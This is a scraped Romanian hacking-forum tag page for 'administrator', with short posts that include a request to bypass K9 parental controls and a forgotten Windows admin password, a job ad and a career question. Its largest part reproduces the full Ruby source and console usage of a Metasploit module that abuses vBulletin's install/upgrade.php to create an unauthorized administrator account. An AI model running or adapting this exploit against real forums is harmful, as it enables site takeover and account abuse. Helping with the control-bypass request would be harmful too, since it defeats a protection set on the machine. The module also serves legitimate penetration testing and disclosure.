Search the Community
Showing results for tags 'administrator'.
-
Salut, folosesc Windows 10 Home si am uitat parola de la contul de administrator si m-am logat pe guest dar pe guest nu ma lasa sa folosesc comanda net user si nici sa instalez sau descarc programe pe el. Precizez ca am si K9 instalat pe el si am uitat parola si de la ala si nu ma lasa sa sterg sau mut bckd.sys din system32 ca sa fac bypass. Este vreo metoda sa reusesc sa fac bypass la K9 sau sa ma loghez in Contul de administrator ? (fara a avea nevoie de un Cd de reinstalare sau chestii dinastea, doar din cmd sau eu stiu..)
-
As vrea sa ma prezint, sunt Alex aka DX am 14 ani si sunt din Bucuresti. Sincer sa fiu, am dat de acest site din intamplare. Ma pasioneaza hackurile dar nu stiu de unde as putea incepe. Sper ca aici o sa fiu binevenit si o sa pot invata multe lucruri.
- 15 replies
-
- administrator
- din
-
(and 3 more)
Tagged with:
-
Angajam Linux System Administrator in Bucuresti. Program L-V 8-17 Salariu negociabil Cei interesati imi pot trimite cv-urile in privat, sau la email hackyard@yahoo.com
-
- administrator
- angajam
-
(and 3 more)
Tagged with:
-
Recent m-am intors din Anglia dupa ce am urmat o facultate in domeniul economic si dupa ce crezusem ca vreau sa lucrez intr-o banca. Am lucrat intr-un mediu similar la Financial Times Mergermarket tot in Londra vreun an de zile si dupa ce m-am intors in Romania mi-am gasit un job la Stefanini ca IT helpdesk technician. Am lucrat vreo 3 luni de zile acolo dar proiectu' nu a luat o intorsatura prea buna si am fost nevoit sa imi gasesc in alta parte. Am fost chemat la un interviu pentru pozitia de jr. sys admin la o firma care presteaza servicii de IT pentru alte firme si dupa ce mi-au evaluat cunostintele (care nu sunt foarte vaste in domeniu) au zis ca ma iau si pe mine ca vor un om pe care sa il formeze. Luni ar trebui sa incep treaba si vroiam parerea voastra cu privire la ce sa citesc, cum sa ma pregatesc pentru pozitia asta sa arat ca sunt interesat si vreau sa invat. Stiu ca trebuie sa invat Linux si sa imi aprofundez cunostintele in retelistica dar nu stiu care ar fi cele mai indicate carti pentru un incepator ca mine.
- 5 replies
-
- administrator
- care
-
(and 3 more)
Tagged with:
-
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. Module Name auxiliary/admin/http/vbulletin_upgrade_admin Authors Unknown juan vazquez <juan.vazquez [at] metasploit.com> References URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst URL: Dangerous vBulletin exploit in the wild URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf > use auxiliary/admin/http/vbulletin_upgrade_admin msf auxiliary(vbulletin_upgrade_admin) > show actions ...actions... msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name> msf auxiliary(vbulletin_upgrade_admin) > show options ...show and set options... msf auxiliary(vbulletin_upgrade_admin) > run Development Source Code ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Administrator Account Creation', 'Description' => %q{ This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. }, 'Author' => [ 'Unknown', # Vulnerability discoverer? found in the wild 'juan vazquez' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5'] ], 'DisclosureDate' => 'Oct 09 2013')) register_options( [ OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']), OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']), OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']), OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc']) ], self.class) end def user datastore["USERNAME"] end def pass datastore["PASSWORD"] end def run if user == pass print_error("#{peer} - Please select a password different than the username") return end print_status("#{peer} - Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'method' =>'POST', 'vars_post' => { "version" => "install", "response" => "true", "checktable" => "false", "firstrun" => "false", "step" => "7", "startat" => "0", "only" => "false", "options[skiptemplatemerge]" => "0", "reponse" => "yes", "htmlsubmit" => "1", "htmldata[username]" => user, "htmldata[password]" => pass, "htmldata[confirmpassword]" => pass, "htmldata[email]" => datastore["EMAIL"] }, 'headers' => { "X-Requested-With" => "XMLHttpRequest" } }) if res and res.code == 200 and res.body =~ /Administrator account created/ print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => user, :pass => pass, :active => true, :proof => res.body ) else print_error("#{peer} - Admin account creation failed") end end end History vBulletin Administrator Account Creation | Rapid7
- 1 reply
-
- administrator
- creation
-
(and 3 more)
Tagged with: